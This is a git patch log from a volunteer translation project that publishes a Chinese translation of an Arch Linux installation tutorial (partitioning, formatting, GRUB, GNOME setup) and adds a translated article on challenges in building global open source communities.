第一步就是给你的硬盘分区。只有一个硬盘很简单,就在它上面创建根分区(/)分区和home分区。 - - - - 我有一个19G的硬盘,我想在这儿安装Arch Linux。为了创建分区,输入: - - ``` - fdisk /dev/sda - ``` - - 按 "n" 创建新分区。按"p" 创建主分区,然后选择分区号。 - - 第一扇区会被自动选择,你只要按回车键。在确定分区的最后一个扇区时,请输入这一分区的大小。 - - - 用相同的方法为home和swap创建两个分区,按"w" 来保存修改并退出。 - - - ![root partition][4] - - ![root partition][10] - - - ### 第四步:创建文件系统 - - 因为我们已经有了三个分区,接下来就是格式化分区并创建文件系统 - - 我们 用mkfs命令在root和home分区上创建文件系统,用mkswap创建swap空间。我们用ext4文件系统格式化磁盘。 - - ``` - mkfs.ext4 /dev/sda1 - mkfs.ext4 /dev/sda3 - - mkswap /dev/sda2 - swapon /dev/sda2 - ``` - 将这些分区挂载在root 和 home下 - - ``` - mount /dev/sda1 /mnt - mkdir /mnt/home - mount /dev/sda3 /mnt/home - ``` - - ### 第五步:安装 - - 我们已经创建分区并挂载了分区,开始安装最基本的包。一个最基本的软件包包括所有系统运行所必需的部件。比如有GNU BASH shell,文件压缩工具,文件系统管理工具,C语言库,压缩工具,Linux 内核和 模块,系统工具,USB管理工具,Vi 文本编辑器等等。 - - - ``` - pacstrap /mnt base base-devel - ``` - - ### **第六步:配置系统** - +![How to install Arch Linux][5] - 生成一个 fstab 文件来规定磁盘分区,块设备,或者远程文件系统是如何挂载进文件系统中的。 - - ``` - genfstab -U /mnt >> /mnt/etc/fstab - ``` - - 进入chroot环境,这样可以为当前进程以及子进程切换当前根目录。 - - ``` - arch-chroot /mnt - ``` - 一些需要与数据总线保持连接的系统工具不能再chroot环境下使用,所以需要从当前环境退出。想要退出chroot,就用下面的命令: - - ``` - exit - ``` - - ### 第七步: 设定时区 - - - 用下面这条命令设定时区 - - ``` - ln -sf /usr/share/// /etc/localtime - ``` - 获取时区列表,输入 - - ``` - ls /usr/share/zoneinfo - ``` - - - 用 hwclock 命令设定硬件时钟 - ``` - hwclock --systohc --utc - ``` - - - ### 第八步: 设置地区 - - 文件 /etc/locale.gen 在注释里包含了所有地区和系统语言设置。用 Vi打开它,然后去掉你希望选择语言前面的注释。 我选择了 **en_GB.UTF-8**。 - - - 现在用下面的命令在 /etc 文件夹里生成 关于地区的配置文件: - - - ``` - locale-gen - echo LANG=en_GB.UTF-8 > /etc/locale.conf - export LANG=en_GB.UTF-8 - ``` - - ### 第九步 :安装 bootloader,设置主机名和root 密码 - - - 创建 /etc/hostname 文件 然后添加一个对应的主机名 - - - 127.0.1.1 myhostname.localdomain myhostname - - 我添加了 ItsFossArch 作为我的主机名: - - ``` - echo ItsFossArch > /etc/hostname - ``` - 然后也将它添加到 /etc/hosts 中 - - 为了安装 bootloader 使用下面的命令: - - - ``` - pacman -S grub - grub-install /dev/sda - grub-mkconfig -o /boot/grub/grub.cfg - ``` - - 创建root密码,输入: - - ``` - passwd - ``` - - 输入你想要的密码。 - - - 完成之后,更新你的系统。但很有可能你的系统已经是最新的,因为你下载的是最近的ISO。 - - - ``` - pacman -Syu - ``` - - 恭喜! 你已经安装了 Arch Linux 的命令行版本。 - - - 接下来,我们会了解到如何为Arch设置并安装一个桌面环境。我很喜欢GNOME的桌面环境,所以在这儿也就选择了这个。 - - - ### 第十步:安装桌面 (这一例子中是GNOME) - - 在你安装桌面之前,你需要先设置网络。 - - 你可以用下面的命令看见你的端口: - - ``` - ip link - ``` - - ![][4] - - ![][11] - - 在我的电脑上,端口名是 **enp0s3.** - - - 将下面这一段加进文件中 - - ``` - vi /etc/systemd/network/enp0s3.network - - [Match] - name=en* - [Network] - DHCP=yes - ``` - 保存并退出。重启网络来应用你刚才的改动。 - - ``` - systemctl restart systemd-networkd - systemctl enable systemd-networkd - ``` - 将下面这两句话加进 /etc/resolv.conf 中 - - ``` - nameserver 8.8.8.8 - nameserver 8.8.4.4 - ``` - - 下一步是安装 X 环境。 - - 输入下面的命令安装 Xorg,并将它作为显示服务器。 - - ``` - pacman -S xorg xorg-server - ``` - gnome 包含了基本的 GNOME桌面,gnome-extra 则包含 GNOME 应用,压缩包管理器,磁盘管理器,文本编辑器和其他的应用。 - - ``` - pacman -S gnome gnome-extra - ``` - - 最后一步是在Arch上开启GDM显示管理器。 - - ``` - systemctl start gdm.service - systemctl enable gdm.service - ``` - 重启你的系统,你就会看见 GNOME的登录界面。 - - - ## Arch Linux 安装总结 - - 我们在视频中展示了一个由Foss读者 Gonzalo Tormo 提供的相似的安装方法(全屏观看,能更好的看清命令): - - - 你也许意识到安装Arch不像安装Ubuntu 一样简单。不过,只要有耐心,你一定可以安装好它,并且向全世界宣布你在用Arch Linux. - - - Arch Linux 安装过程本身就是一个学习的机会。一旦安装完毕,我建议你参考它的Wiki去尝试其他的桌面环境,从而更深入了解这一操作系统。你可以探索它,发现它的强大之处。 - - - 如果你在安装Arch 的过程中遇到任何问题,请在评论中给我们留言。 - - - -------------------------------------------------------------------------------- - - via: https://itsfoss.com/install-arch-linux/ - - 作者:[Ambarish Kumar][a] - 译者:[译者ID](https://github.com/译者ID) - 校对:[校对者ID](https://github.com/校对者ID) - - 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - - [a]:https://itsfoss.com/author/ambarish/ - [1] https://www.archlinux.org/ - [2] https://en.wikipedia.org/wiki/Do_it_yourself - [3] https://wiki.archlinux.org/index.php/pacman - [4] data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= - [5] https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png - [6] https://www.archlinux.org/download/ - [7] https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems - [8] https://itsfoss.com/live-usb-antergos/ - [9] https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg - [10] https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png - [11] https://itsfoss.com/wp-content/uploads/2017/12/11.png - [12] https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/ - [13] https://wiki.archlinux.org/ +> 简要说明:这一教程会教你如何用简单步骤安装 Arch Linux。 + +[Arch Linux][1] 是一个 x86-64 通用发行版,它流行于那些喜欢 [DIY][2] Linux 系统的用户和 Linux 铁杆粉丝当中。其默认的安装文件只含有一个最基本的系统,它希望使用者自己配置并使用 Arch 系统。其基于 KISS 原则(使它保持简单、傻瓜Keep It Simple, Stupid!),Arch Linux 是一个专注于优雅、代码正确,精简而简洁的系统。 + +Arch 支持滚动发布模式,并且有自己的软件包管理器 —— [pacman][3]。为了提供一个先锐的操作系统,Arch 绝不会错失任何一个最新的源。实际上,它只提供了一个最小化的基本操作系统,使得你可以在低端硬件上安装 Arch,并且只安装你所必须的软件包。 + +同时,它也是最流行的从头开始学习 Linux 的操作系统之一。如果你想以 DIY 精神自己体验一番,你应该尝试一下 Arch Linux。 这被许多 Linux 用户视作核心的 Linux 体验。 + +在这篇文章里,我们会了解到如何安装、配置 Arch 并在其上安装桌面环境。 + +### 如何安装 Arch Linux + +我们在这里讨论的安装方法是从你的电脑上**完全删除已有的操作系统** ,而后在其上安装 Arch Linux。如果你想遵循这一教程安装 Arch,请确保你已经备份了所有文件,否则你就会失去它们。切切。 + +在你从 USB 上安装 Arch 之前,请确保你已经满足了以下条件: + +#### 安装 Arch Linux 的条件: + +* 一个兼容 x86_64(例如 64 位)的机器 +* 最小 512M 内存(建议 2GB) +* 最少 1GB 的磁盘空余空间(日常使用推荐 20GB) +* 可以访问互联网 +* 至少有 2GB 存储空间的 USB 存储器 +* 熟悉 Linux 命令行 + +一旦你确认满足所有条件,就可以开始安装 Arch Linux 了。 + +#### 第一步:下载 ISO 文件 + +你可以从[官网][6]上下载 ISO。安装 Arch Linux 需要一个至少有 512M 内存和 800M 磁盘空间,并兼容 x86_64 (如 64 位)的机器。不过,建议至少有 2G 内存和 20G 磁盘空间,这样安装桌面环境时就不会遇到麻烦。 + +#### 第二步:创建一个 Arch Linux 的现场版 USB 存储器 + +我们需要用你刚刚下载的 ISO 文件创建一个 Arch Linux 的现场版live USB 存储器。 + +如果你使用 Linux,你可以用 `dd` 命令来创建现场版 USB 存储器。 记得将下面的例子中的 `/path/to/archlinux.iso` 改成你的 ISO 文件的实际存储位置,`/dev/sdx` 改成你的磁盘设备号(例如 `/dev/sdb`)。你可以通过 [lsblk][7] 命令来了解你的设备信息。 + +``` +dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync +``` +在 Windows 下,有多种方法来创建现场版 USB 存储器。 推荐工具是 Rufus。我们之前已经有[如何使用这一工具创建Antergos 现场版 USB 存储器][8]的教程。因为 Antergos 发行版是基于 Arc h的,所以你可以使用同一教程。 + +#### 步骤三:从现场版 USB 存储器上启动 + +一旦你已经创建了 Arch Linux 的现场版 USB 存储器,关闭你的电脑。插上你的 USB 存储器然后启动系统。在开机启动时,持续按 F2、F10 或 F1 之类的按键(根据你的电脑型号而定)进入启动设置。在这里,选择“从 USB 存储器或可移除设备启动”这一项。 + +一旦你选择了它,你会看到这样一个选项: + +![Arch Linux][9] + +选择“Boot Arch Linux (x86\_64)”。经过各种系统检查后,Arch Linux 会启动到 root 用户的命令行界面。 + +接下来的步骤包括磁盘分区、创建文件系统并挂载它。 + +#### 第四步:磁盘分区 + +第一步就是给你的硬盘分区。单根分区是最简单的,就在它上面创建根分区(`/`)分区、交换分区和 `home` 分区。 + +我有一个 19G 的硬盘,我想在这儿安装 Arch Linux。为了创建分区,输入: + +``` +fdisk /dev/sda +``` + +按 `n` 创建新分区。按 `p` 创建主分区,然后选择分区号。 + +第一个扇区会被自动选择,你只要按回车键。在确定分区的最后一个扇区时,请输入这一分区的大小。 + +用相同的方法为 `home` 和交换分区创建两个分区,按 `w` 来保存修改并退出。 + +![root partition][10] + + +#### 第四步:创建文件系统 + +因为我们已经有了三个分区,接下来就是创建文件系统来格式化分区。 + +我们用 `mkfs` 命令在根分区和 `home` 分区上创建文件系统,用 `mkswap` 创建交换分区。我们用 ext4 文件系统格式化磁盘。 + +``` +mkfs.ext4 /dev/sda1 +mkfs.ext4 /dev/sda3 + +mkswap /dev/sda2 +swapon /dev/sda2 +``` + +将这些分区挂载在根分区和 `home` 分区下: + +``` +mount /dev/sda1 /mnt +mkdir /mnt/home +mount /dev/sda3 /mnt/home +``` + +#### 第五步:安装 + +我们已经创建分区并挂载了分区,开始安装最基本的软件包。基本的软件包包括了系统运行所必需的所有软件包。比如有 GNU BASH shell、文件压缩工具、文件系统管理工具、C 语言库、压缩工具、Linux 内核及其模块,类库、系统工具、USB 设备工具、Vi 文本编辑器等等。 + +``` +pacstrap /mnt base base-devel +``` + +#### 第六步:配置系统 + +生成一个 `fstab` 文件来规定磁盘分区、块设备,或者远程文件系统是如何挂载进文件系统中的。 + +``` +genfstab -U /mnt >> /mnt/etc/fstab +``` + +进入 chroot 环境,这样可以为当前进程以及子进程切换当前根目录。 + +``` +arch-chroot /mnt +``` + +一些需要与数据总线保持连接的 systemd 工具不能在 chroot 环境下使用,所以需要从当前环境退出。想要退出 chroot,就用下面的命令: + +``` +exit +``` + +#### 第七步:设定时区 + +用下面这条命令设定时区: + +``` +ln -sf /usr/share/<时区信息>/<地区>/<城市> /etc/localtime +``` + +获取时区列表,输入: + +``` +ls /usr/share/zoneinfo +``` + +用 `hwclock` 命令设定硬件时钟: + +``` +hwclock --systohc --utc +``` + +#### 第八步:设置地区 + +文件 `/etc/locale.gen` 在注释里包含了所有地区和系统语言设置。用 Vi 打开它,然后去掉你希望选择语言前面的注释。 我选择了 `en_GB.UTF-8`。 + +现在用下面的命令在 `/etc` 文件夹里生成 关于地区的配置文件: + +``` +locale-gen +echo LANG=en_GB.UTF-8 > /etc/locale.conf +export LANG=en_GB.UTF-8 +``` + +#### 第九步 :安装 bootloader,设置主机名和 root 密码 + +创建 `/etc/hostname` 文件 然后添加一个对应的主机名: + +``` +127.0.1.1 myhostname.localdomain myhostname +``` + +我添加了 `ItsFossArch` 作为我的主机名: + +``` +echo ItsFossArch > /etc/hostname +``` + +然后也将它添加到 `/etc/hosts` 中 + +为了安装 bootloader 使用下面的命令: + +``` +pacman -S grub +grub-install /dev/sda +grub-mkconfig -o /boot/grub/grub.cfg +``` + +创建 root 密码,输入: + +``` +passwd +``` + +输入你想要的密码。 + +完成之后,更新你的系统。但很有可能你的系统已经是最新的,因为你下载的是最新的 ISO。 + +``` +pacman -Syu +``` + +恭喜! 你已经安装了 Arch Linux 的命令行版本。 + +接下来,我们会了解到如何为 Arch 设置并安装一个桌面环境。我很喜欢 GNOME 桌面环境,所以在这儿也就选择了这个。 + +#### 第十步:安装桌面(这一例子中是 GNOME) + +在你安装桌面之前,你需要先设置网络。 + +你可以用下面的命令看见你的端口: + +``` +ip link +``` + +![][11] + +在我的电脑上,端口名是 `enp0s3`。 + +将下面这一段加进文件中: + +``` +vi /etc/systemd/network/enp0s3.network + +[Match] +name=en* +[Network] +DHCP=yes +``` + +保存并退出。重启网络来应用你刚才的改动。 + +``` +systemctl restart systemd-networkd +systemctl enable systemd-networkd +``` + +将下面这两句话加进 `/etc/resolv.conf` 中 + +``` +nameserver 8.8.8.8 +nameserver 8.8.4.4 +``` + +下一步是安装 X 环境。 + +输入下面的命令安装 Xorg,并将它作为显示服务器。 + +``` +pacman -S xorg xorg-server +``` + +gnome 包含了基本的 GNOME桌面,gnome-extra 则包含 GNOME 应用、归档管理器、磁盘管理器、文本编辑器和其它的应用。 + +``` +pacman -S gnome gnome-extra +``` + +最后一步是在 Arch 上开启 GDM 显示管理器。 + +``` +systemctl start gdm.service +systemctl enable gdm.service +``` + +重启你的系统,你就会看见 GNOME 的登录界面。 + +### Arch Linux 安装总结 + +我们在下面的视频中展示了一个由 Foss 读者 Gonzalo Tormo 提供的相似的安装方法(全屏观看,能更好的看清命令): + +![视频](https://youtu.be/iENmRwVhsTQ) + +你也许意识到安装 Arch 不像[安装 Ubuntu][12] 一样简单。不过,只要有耐心,你一定可以安装好它,并且向全世界宣布你在用 Arch Linux。 + +Arch Linux 安装过程本身就是一个学习的机会。一旦安装完毕,我建议你参考它的 Wiki 去尝试其它的桌面环境,从而更深入了解这一操作系统。你可以探索它,发现它的强大之处。 + +如果你在安装 Arch 的过程中遇到任何问题,请在评论中给我们留言。 + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/install-arch-linux/ + +作者:[Ambarish Kumar][a] +译者:[wenwensnow](https://github.com/wenwensnow) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/ambarish/ +[1]:https://www.archlinux.org/ +[2]:https://en.wikipedia.org/wiki/Do_it_yourself +[3]:https://wiki.archlinux.org/index.php/pacman +[4]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[5]:https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png +[6]:https://www.archlinux.org/download/ +[7]:https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems +[8]:https://itsfoss.com/live-usb-antergos/ +[9]:https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg +[10]:https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png +[11]:https://itsfoss.com/wp-content/uploads/2017/12/11.png +[12]:https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/ +[13]:https://wiki.archlinux.org/ From 060d5e587cf7e3cbdadea7f4a3f4063ca02d71aa Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 25 Dec 2017 10:25:06 +0800 Subject: [PATCH 0774/1627] PUB:20171211 How to Install Arch Linux [Step by Step Guide].md @wenwensnow https://linux.cn/article-9170-1.html --- .../20171211 How to Install Arch Linux [Step by Step Guide].md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171211 How to Install Arch Linux [Step by Step Guide].md (100%) diff --git a/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md b/published/20171211 How to Install Arch Linux [Step by Step Guide].md similarity index 100% rename from translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md rename to published/20171211 How to Install Arch Linux [Step by Step Guide].md From 1d5156c5eaae4d8020defc131199390ba3a0bcbc Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 25 Dec 2017 14:39:58 +0800 Subject: [PATCH 0775/1627] =?UTF-8?q?translate=20done=20at=202017=E5=B9=B4?= =?UTF-8?q?=2012=E6=9C=88=2025=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=B8=80=2014?= =?UTF-8?q?:39:58=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... when building great global communities.md | 71 ------------------- ... when building great global communities.md | 70 ++++++++++++++++++ 2 files changed, 70 insertions(+), 71 deletions(-) delete mode 100644 sources/tech/20171208 Overcoming challenges when building great global communities.md create mode 100644 translated/tech/20171208 Overcoming challenges when building great global communities.md diff --git a/sources/tech/20171208 Overcoming challenges when building great global communities.md b/sources/tech/20171208 Overcoming challenges when building great global communities.md deleted file mode 100644 index 956f37affb..0000000000 --- a/sources/tech/20171208 Overcoming challenges when building great global communities.md +++ /dev/null @@ -1,71 +0,0 @@ -translating lujun9972 -Overcoming challenges when building great global communities -====== -![配图][https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community2.png?itok=1blC7-NY] - -Today's open source communities include people from all around the world. What challenges can you expect when establishing an online community, and how can you help overcome them? - -People contributing to an open source community share a commitment to the software they're helping to develop. In the past, people communicated by meeting in person at a set place and time, or through letters or phone calls. Today, technology has fostered growth of online communities--people can simply pop into a chat room or messaging channel and start working together. You might work with someone in Morocco in the morning, for example, and with someone in Hawaii that evening. - -## Global communities: 3 common challenges - -Anyone who's ever worked in a group knows that differences of opinion can be difficult to overcome. In online communities, language barriers, different time zones, and cultural differences can also create challenges. - -### Language barriers - -English is the predominant language in open source communities, so people without strong English language skills may find it difficult to understand documentation or suggest changes. To overcome this problem and attract community members from other areas, invite bilingual people into your community. Ask around--you might be surprised by who is fluent in other languages. Bilingual community members can help others contribute by helping to bridge language barriers, and can help your project engage with a wider audience by translating software and documentation. - -People also program in different languages. You might prefer working in Bash, for example, while others prefer Python, Ruby, C, and so on. This also means that people might find it difficult to contribute to your codebase because of the programming language. It is important for project leaders to choose a language that's been adopted by the software community in general. If you choose a less-used programming language, fewer people will participate. - -### Different time zones - -Time zones can present another challenge to open source communities. For example, if you are in San Francisco and want to schedule a video call with a member who is in London, you'll need to adjust for an 8-hour time difference. You may need to work very late or early, depending on the locations of your colleagues. - -Physical sprints, in which your team works together in the same time zone, can help address this challenge, but few communities can afford this option. Schedule regular virtual meetings to discuss your projects, and establish a regular time and place where everyone can discuss pending issues, upcoming releases, and other topics. - -Different time zones can also work to your advantage because team members can work around the clock. If you have a real-time communication platform such as IRC, users can find someone to answer their questions at any time of the day or night. - -### Cultural differences - -Cultural differences can be one of the greatest challenges for open source communities. People from different parts of the world have different ways of thinking, planning, and solving problems. Political situations can also affect work environments and influence decisions. - -As a project leader, you should strive to build an environment of tolerance for different perspectives. Cultural differences can encourage discussion among the community. Constructive discussions are always good for projects because they help community members see different angles of the same topic. Different opinions also help improve problem solving. - -To succeed in open source, your team must learn to embrace differences. This is not always easy, but diversity will ultimately benefit your community. - -## Additional ways to strengthen online communities - -**Go local:** Online community members may discover contributors who are located nearby--meet up and start a local community. Two people are all you need to start a community. Invite other users and employees at local companies; they might even offer space for future meetups. - -**Find or plan events:** Hosting events is a great, inexpensive way to build a local community. Get together at a local coffee shop or brewery to celebrate the newest version release or the implementation of a core feature. The more events you host, the more people will likely join you (even if just out of curiosity). Eventually, a company may offer you space for meetups, or you can raise funds to cover your expenses. - -**Keep in touch:** After each event, reach out to local community members. Collect email addresses or other contact information, and ask them to join your chat platform. Invite them to contribute to the wider community. You will likely discover lots of local talent, and who knows--you might even find your next core developer! - -**Share your experiences:** Your local community is a valuable resource, not only for you, but also for the wider community. Share your findings and experiences with others who might benefit from them. If you're sure how to start planning an event or a meetup, ask others for their insights. Chances are someone out there has experience that can help get you on the right track. - -**Consider cultural differences:** Remember that cultural norms vary by location and population, so scheduling a particular event in the early morning might be fine for people in one location, for example, but inappropriate for people in another. Of course, you can--and should--use references from the wider community to gain a better understanding of such differences, but you will sometimes need to experiment through trial and error. Don't forget to share what you learn so others can benefit from your experience. - -**Check your personal views:** Avoid airing strong opinions (especially regarding politics) in the work environment. This will only inhibit open communication and problem-solving. Instead, focus on engaging in constructive discussion with team members. If you do find yourself in a heated argument, take a step back, cool down, and refocus the discussion in a more positive direction. Discussions should always be constructive, and different perspectives should benefit your community. Never put your personal views before the community 's greater good. - -**Try asynchronous communication:** Real-time chat platforms are on everyone's radar these days, but don't forget email. If you can't find someone in your online platform, send them an email. Chances are you'll get a quick reply. Consider emerging platforms that focus on async communications, such as [Twist][1], and don't forget to check and update forums and wikis. - -**Try different solutions:** There's no single perfect formula, and the most effective way to learn is often through experience. Trial and error can teach you a lot. Do not be afraid to fail; you will learn from failure and you can never stop improving. - -## Communities require nurturing - -Think of your community as a small plant. Each day you must water it and make sure it gets sunlight and oxygen. Take the same approach to your communities: Listen to your contributors, and remember that you are dealing with human beings who need to be in constant communication to function properly. If your community loses the human touch, people will stop contributing to it. - -Finally, keep in mind that every community is different, and no single solution will ever apply to all of them. Be persistent and never stop learning from your community, and then adapt. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/12/working-worldwide-communities - -作者:[José Antonio Rey][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/jose -[1]:https://twistapp.com diff --git a/translated/tech/20171208 Overcoming challenges when building great global communities.md b/translated/tech/20171208 Overcoming challenges when building great global communities.md new file mode 100644 index 0000000000..13be9e9c68 --- /dev/null +++ b/translated/tech/20171208 Overcoming challenges when building great global communities.md @@ -0,0 +1,70 @@ +构建全球社区带来的挑战 +====== +![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community2.png?itok=1blC7-NY) + +今天的开源组织参与人员来自于全世界. 你能预见到组建在线社区可能遇到哪些困难吗?有没有什么办法能够克服这些困难呢? + +为开源社区贡献力量的人共同合作推动软件的开发和发展(People contributing to an open source community share a commitment to the software they're helping to develop). 在过去, 人们是面对面或者通过邮件和电话来交流的. 今天, 科技孕育出了在线交流--人们只需要进入一个聊天室或消息渠道就能一起工作了. 比如,你可以早上跟摩洛哥的人一起工作,到了晚上又跟夏威夷的人一起工作. + +## 全球社区的三个挑战 + +任何一个团队合作过的人都知道意见分歧是很难被克服的. 对于在线社区来说, 语言障碍, 不同的时区, 以及文化差异也带来了新的挑战. + +### 语言障碍 + +英语是开源社区中的主流语言, 因此英语不好的人会很难看懂文档和修改意见. 为了克服这个问题,吸引其他地区的社区成员,你需要邀请双语者参与到社区中来. 问问周围的人--你会发现意想不到的精通其他语言的人. 社区的双语成员可以帮助别人跨越语言障碍, 并且可以通过翻译软件和文档来扩大项目的受众范围. + +人们使用的编程语言也不一样. 你可能喜欢用Bash而其他人则可能更喜欢 Python, Ruby, C 等其他语言. 这意味着,人们可能由于编程语言的原因而难以为你的代码库做贡献. 项目负责人为项目选择一门被软件社区广泛认可的语言至关重要. 如果你选择了一门偏门的语言, 则很少人能够参与其中. + +### 不同的时区 + +时区为开源社区带来了另一个挑战. 比如, 若你在芝加哥,想与一个在伦敦的成员安排一次视频会议, 你需要调整8小时的时差. 根据合作者的地理位置,你可能要在深夜或者清晨工作. + +肉体转移(Physical sprints),让你的团队在同一个时区工作可以帮助克服这个挑战, 但这中方法只有极少数社区才能够负担的起. 我们还可以定期举行虚拟会议讨论项目, 建立一个固定的时间和地点以供所有人来讨论未决的事项, 即将发布的版本等其他主题. + +不同的时区也可以成为你的优势,因为团队成员可以全天候的工作. 若你拥有一个类似 IRC 这样的实时交流平台, 用户可以在任意时间都能找到人来回答问题. + +### 文化差异 + +文化差异是开源组织面临的最大挑战. 世界各地的人都有不同的思考方式, 计划以及解决问题的方法. 政治环境也会影响工作环境并影响决策. + +作为项目负责人, 你应该努力构建一种能包容不同看法的环境. 文化差异可以鼓励社区沟通. 建设性的讨论总是对项目有益,因为它可以帮助社区成员从不同角度看待问题. 不同意见也有助于解决问题. + +要成功开源, 团队必须学会拥抱差异. 这不简单, 但多样性最终会使社区收益. + +## 加强在线沟通的其他方法 + +**本地化:** 在线社区成员可能会发现位于附近的贡献者--去见个面并组织一个本地社区. 只需要两个人就能组建一个社区了. 可以邀请其他当地用户或雇员参与其中; 他们甚至还能为以后的聚会提供场所呢. + +**组织活动:** 组织活动是构建本地社区的好方法,而且费用也不高. 你可以在当地的咖啡屋或者啤酒厂聚会,庆祝最新版本的发布或者某个核心功能的实现. 组织的活动越多, 人们参与的热情就越高(即使只是因为单纯的好奇心). 最终, 可能会找到一家公司为你提供聚会的场地,或者为你提供赞助. + +**保持联系:** 每次活动后, 联系本地社区成员. 收起电子邮箱地址或者其他联系方式并邀请他们参与到你的交流平台中. 邀请他们为其他社区做贡献. 你很可能会发现很多当地的人才,运气好的话,甚至可能发现新的核心开发人员! + +**分享经验:** 本地社区是一种非常有价值的资源, 对你,对其他社区来说都是. 与可能受益的人分享你的发现和经验. 如果你不清楚(译者注:这里原文是说sure,但是根据上下文,这里应该是not sure)如何策划一场活动或会议, 可以咨询其他人的意见. 也许能找到一些有经验的人帮你走到正轨. + +**关注文化差异:** 记住,文化规范因地点和人口而异, 因此在清晨安排某项活动可能适用于一个地方的人,但是不合适另一个地方的人. 当然, 你可以--也应该--利用其他社区的参考资料来更好地理解这种差异性, 但有时你也需要通过试错的方式来学习. 不要忘了分享你所学到的东西,让别人也从中获益. + +**检查个人观点:** 避免在工作场合提出带有很强主观色彩的观点(尤其是与政治相关的观点). 这会抑制开放式的沟通和问题的解决. 相反,应该专注于鼓励与团队成员展开建设性讨论. 如果你发现陷入了激烈的争论中, 那么后退一步,冷静一下, 然后再从更加积极的角度出发重新进行讨论. 讨论必须是有建设性的,从多个角度讨论问题对社区有益. 永远不要把自己的主观观念放在社区的总体利益之前. + +**尝试异步沟通:** 这些天,实时通讯平台已经引起了大家的关注, 但除此之外还别忘了电子邮件. 如果没有在网络平台上找到人的话,可以给他们发送一封电子邮件. 有可能你很快就能得到回复. 考虑使用那些专注于异步沟通的平台,比如 [Twist][1], 也不要忘了查看并更新论坛和维基. + +**使用不同的解决方案:** 并不存在一个单一的完美的解决方法, 学习最有效的方法还是通过经验来学习. 从反复试验中你可以学到很多东西.不要害怕失败; 你慧聪失败中学到很多东西从而不停地进步. + +## 社区需要营养 + +将社区想象成是一颗植物的幼苗. 你需要每天给它浇水,提供阳光和氧气. 社区也是一样: 倾听贡献者的声音, 记住你在与活生生的人进行互动,他们需要以合适的方式进行持续的交流. 如果社区缺少了人情味, 人们会停止对它的贡献. + +最后, 请记住,每个社区都是不同的, 没有一种单一的解决方法能够适用于所有社区. 坚持不断地从社区中学习并适应这个社区. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/working-worldwide-communities + +作者:[José Antonio Rey][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jose +[1]:https://twistapp.com From 73088eaed911a83350570550c5864cac8bbbd576 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 25 Dec 2017 14:58:20 +0800 Subject: [PATCH 0776/1627] reformat --- ... when building great global communities.md | 44 +++++++++---------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/translated/tech/20171208 Overcoming challenges when building great global communities.md b/translated/tech/20171208 Overcoming challenges when building great global communities.md index 13be9e9c68..679670f025 100644 --- a/translated/tech/20171208 Overcoming challenges when building great global communities.md +++ b/translated/tech/20171208 Overcoming challenges when building great global communities.md @@ -1,60 +1,60 @@ 构建全球社区带来的挑战 ====== -![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community2.png?itok=1blC7-NY) +![配图 ](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community2.png?itok=1blC7-NY) -今天的开源组织参与人员来自于全世界. 你能预见到组建在线社区可能遇到哪些困难吗?有没有什么办法能够克服这些困难呢? +今天的开源组织参与人员来自于全世界。你能预见到组建在线社区可能遇到哪些困难吗?有没有什么办法能够克服这些困难呢? -为开源社区贡献力量的人共同合作推动软件的开发和发展(People contributing to an open source community share a commitment to the software they're helping to develop). 在过去, 人们是面对面或者通过邮件和电话来交流的. 今天, 科技孕育出了在线交流--人们只需要进入一个聊天室或消息渠道就能一起工作了. 比如,你可以早上跟摩洛哥的人一起工作,到了晚上又跟夏威夷的人一起工作. +为开源社区贡献力量的人共同合作推动软件的开发和发展 (People contributing to an open source community share a commitment to the software they're helping to develop)。在过去,人们是面对面或者通过邮件和电话来交流的。今天,科技孕育出了在线交流--人们只需要进入一个聊天室或消息渠道就能一起工作了。比如,你可以早上跟摩洛哥的人一起工作,到了晚上又跟夏威夷的人一起工作。 ## 全球社区的三个挑战 -任何一个团队合作过的人都知道意见分歧是很难被克服的. 对于在线社区来说, 语言障碍, 